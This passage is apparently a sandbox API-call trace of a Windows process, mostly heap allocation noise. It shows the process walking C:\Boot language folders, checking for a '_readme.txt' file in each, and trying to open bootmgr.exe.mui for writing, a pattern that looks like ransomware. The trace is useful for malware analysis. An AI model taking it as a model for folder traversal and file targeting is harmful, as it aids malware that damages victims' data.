(HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.195] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.195] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0058.195] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.195] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.195] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.195] PathFindFileNameW (pszPath="") returned="" [0058.195] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.196] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.196] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.196] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.196] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0058.196] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0058.196] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.196] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.196] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.196] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned=".mui" [0058.196] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.197] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb45b50, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.197] PathFindExtensionW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned=".txt" [0058.197] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb45b50, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.197] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.197] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.197] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.197] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0058.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.197] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.197] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.197] PathFindFileNameW (pszPath="") returned="" [0058.197] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.197] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.197] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.198] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0058.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.198] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x81c) returned 0x9c5d1d0 [0058.198] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0058.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.198] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0058.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.198] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.198] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.198] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.198] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.198] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.198] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0058.198] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.199] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.199] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned=".txt" [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.199] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb6bcb0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.199] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.199] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.199] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.201] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.201] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.202] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.202] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: 